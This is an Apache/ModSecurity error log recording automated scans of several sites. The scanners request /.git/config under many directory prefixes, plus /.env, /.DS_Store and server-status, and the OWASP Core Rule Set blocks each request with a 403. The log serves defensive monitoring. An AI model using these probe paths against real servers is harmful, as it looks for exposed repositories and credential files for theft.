[Sun Jul 07 03:38:11.824879 2024] [:error] [pid 263882] [client 83.147.52.49:43424] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /site/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.git/config"] [unique_id "Zonxg1OeDUJXHqhWEUNgQQAAAAU"]
[Sun Jul 07 03:38:11.825046 2024] [:error] [pid 263882] [client 83.147.52.49:43424] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.git/config"] [unique_id "Zonxg1OeDUJXHqhWEUNgQQAAAAU"]
[Sun Jul 07 03:38:11.825229 2024] [:error] [pid 263882] [client 83.147.52.49:43424] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.git/config"] [unique_id "Zonxg1OeDUJXHqhWEUNgQQAAAAU"]
[Sun Jul 07 03:38:11.916724 2024] [:error] [pid 263880] [client 83.147.52.49:43392] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wiki/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wiki/.git/config"] [unique_id "Zonxg3EdEdtlNTcad-lqggAAAAM"]
[Sun Jul 07 03:38:11.917220 2024] [:error] [pid 263880] [client 83.147.52.49:43392] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wiki/.git/config"] [unique_id "Zonxg3EdEdtlNTcad-lqggAAAAM"]
[Sun Jul 07 03:38:11.917659 2024] [:error] [pid 263880] [client 83.147.52.49:43392] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wiki/.git/config"] [unique_id "Zonxg3EdEdtlNTcad-lqggAAAAM"]
[Sun Jul 07 03:38:11.918406 2024] [:error] [pid 263881] [client 83.147.52.49:43408] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.git/config"] [unique_id "Zonxg8GCFK9BzeBtBpHL-QAAAAQ"]
[Sun Jul 07 03:38:11.918857 2024] [:error] [pid 263881] [client 83.147.52.49:43408] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.git/config"] [unique_id "Zonxg8GCFK9BzeBtBpHL-QAAAAQ"]
[Sun Jul 07 03:38:11.919276 2024] [:error] [pid 263881] [client 83.147.52.49:43408] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.git/config"] [unique_id "Zonxg8GCFK9BzeBtBpHL-QAAAAQ"]
[Sun Jul 07 03:38:11.923247 2024] [:error] [pid 263877] [client 83.147.52.49:43344] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/plugins/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/plugins/.git/config"] [unique_id "Zonxg8cBKsw7eUtn1AYU-QAAAAA"]
[Sun Jul 07 03:38:11.924962 2024] [:error] [pid 263879] [client 83.147.52.49:43360] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/themes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/themes/.git/config"] [unique_id "ZonxgwV9onmuO0oxibIM3AAAAAI"]
[Sun Jul 07 03:38:11.925385 2024] [:error] [pid 263879] [client 83.147.52.49:43360] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/themes/.git/config"] [unique_id "ZonxgwV9onmuO0oxibIM3AAAAAI"]
[Sun Jul 07 03:38:11.925879 2024] [:error] [pid 263879] [client 83.147.52.49:43360] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/themes/.git/config"] [unique_id "ZonxgwV9onmuO0oxibIM3AAAAAI"]
[Sun Jul 07 03:38:11.925982 2024] [:error] [pid 263878] [client 83.147.52.49:43426] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /git/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/git/.git/config"] [unique_id "Zonxgyq8waR4sWzzOPDlewAAAAE"]
[Sun Jul 07 03:38:11.926239 2024] [:error] [pid 263878] [client 83.147.52.49:43426] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/git/.git/config"] [unique_id "Zonxgyq8waR4sWzzOPDlewAAAAE"]
[Sun Jul 07 03:38:11.926483 2024] [:error] [pid 263878] [client 83.147.52.49:43426] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/git/.git/config"] [unique_id "Zonxgyq8waR4sWzzOPDlewAAAAE"]
[Sun Jul 07 03:38:11.927705 2024] [:error] [pid 264361] [client 83.147.52.49:43520] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /css/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/css/.git/config"] [unique_id "Zonxg6hJN3w1yQAx8ZjcqwAAAAY"]
[Sun Jul 07 03:38:11.927931 2024] [:error] [pid 264361] [client 83.147.52.49:43520] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/css/.git/config"] [unique_id "Zonxg6hJN3w1yQAx8ZjcqwAAAAY"]
[Sun Jul 07 03:38:11.928167 2024] [:error] [pid 264361] [client 83.147.52.49:43520] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/css/.git/config"] [unique_id "Zonxg6hJN3w1yQAx8ZjcqwAAAAY"]
[Sun Jul 07 03:38:11.928689 2024] [:error] [pid 263877] [client 83.147.52.49:43344] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/plugins/.git/config"] [unique_id "Zonxg8cBKsw7eUtn1AYU-QAAAAA"]
[Sun Jul 07 03:38:11.928914 2024] [:error] [pid 263877] [client 83.147.52.49:43344] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/plugins/.git/config"] [unique_id "Zonxg8cBKsw7eUtn1AYU-QAAAAA"]
[Sun Jul 07 03:38:11.928911 2024] [:error] [pid 263882] [client 83.147.52.49:43424] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /login/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/login/.git/config"] [unique_id "Zonxg1OeDUJXHqhWEUNgQgAAAAU"]
[Sun Jul 07 03:38:11.929304 2024] [:error] [pid 263882] [client 83.147.52.49:43424] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/login/.git/config"] [unique_id "Zonxg1OeDUJXHqhWEUNgQgAAAAU"]
[Sun Jul 07 03:38:11.929719 2024] [:error] [pid 263882] [client 83.147.52.49:43424] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/login/.git/config"] [unique_id "Zonxg1OeDUJXHqhWEUNgQgAAAAU"]
[Sun Jul 07 03:38:12.019455 2024] [:error] [pid 263880] [client 83.147.52.49:43392] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /index/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/index/.git/config"] [unique_id "ZonxhHEdEdtlNTcad-lqgwAAAAM"]
[Sun Jul 07 03:38:12.019524 2024] [:error] [pid 263881] [client 83.147.52.49:43408] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /back/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/back/.git/config"] [unique_id "ZonxhMGCFK9BzeBtBpHL-gAAAAQ"]
[Sun Jul 07 03:38:12.019933 2024] [:error] [pid 263880] [client 83.147.52.49:43392] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/index/.git/config"] [unique_id "ZonxhHEdEdtlNTcad-lqgwAAAAM"]
[Sun Jul 07 03:38:12.019979 2024] [:error] [pid 263881] [client 83.147.52.49:43408] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/back/.git/config"] [unique_id "ZonxhMGCFK9BzeBtBpHL-gAAAAQ"]
[Sun Jul 07 03:38:12.020445 2024] [:error] [pid 263881] [client 83.147.52.49:43408] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/back/.git/config"] [unique_id "ZonxhMGCFK9BzeBtBpHL-gAAAAQ"]
[Sun Jul 07 03:38:12.020459 2024] [:error] [pid 263880] [client 83.147.52.49:43392] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/index/.git/config"] [unique_id "ZonxhHEdEdtlNTcad-lqgwAAAAM"]
[Sun Jul 07 03:38:12.025795 2024] [:error] [pid 263879] [client 83.147.52.49:43360] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /backend/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.git/config"] [unique_id "ZonxhAV9onmuO0oxibIM3QAAAAI"]
[Sun Jul 07 03:38:12.026205 2024] [:error] [pid 263879] [client 83.147.52.49:43360] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.git/config"] [unique_id "ZonxhAV9onmuO0oxibIM3QAAAAI"]
[Sun Jul 07 03:38:12.026592 2024] [:error] [pid 263879] [client 83.147.52.49:43360] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.git/config"] [unique_id "ZonxhAV9onmuO0oxibIM3QAAAAI"]
[Mon Jul 08 13:22:55.109597 2024] [:error] [pid 286715] [client 31.220.0.86:35268] [client 31.220.0.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZovMDzCabmQ_8tBaXbY3IQAAAAY"]
[Mon Jul 08 13:22:55.110370 2024] [:error] [pid 286715] [client 31.220.0.86:35268] [client 31.220.0.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZovMDzCabmQ_8tBaXbY3IQAAAAY"]
[Mon Jul 08 13:22:55.111355 2024] [:error] [pid 286715] [client 31.220.0.86:35268] [client 31.220.0.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZovMDzCabmQ_8tBaXbY3IQAAAAY"]
[Sat Jul 13 22:42:40.160193 2024] [rewrite:error] [pid 428768] [client 43.128.80.91:22814] AH10411: Rewritten query string contains control characters or spaces
[Wed Jul 17 21:49:17.246720 2024] [authz_core:error] [pid 519974] [client 159.65.18.197:34706] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Jul 17 21:49:18.282265 2024] [:error] [pid 519979] [client 159.65.18.197:50658] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZpggPqUcoCOhsE62VQ8IqgAAAAA"]
[Wed Jul 17 21:49:18.282848 2024] [:error] [pid 519979] [client 159.65.18.197:50658] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZpggPqUcoCOhsE62VQ8IqgAAAAA"]
[Wed Jul 17 21:49:18.283330 2024] [:error] [pid 519979] [client 159.65.18.197:50658] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZpggPqUcoCOhsE62VQ8IqgAAAAA"]
[Wed Jul 17 21:49:18.376279 2024] [:error] [pid 519973] [client 159.65.18.197:50672] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZpggPvRkcrrrWXarPp80igAAAAU"]
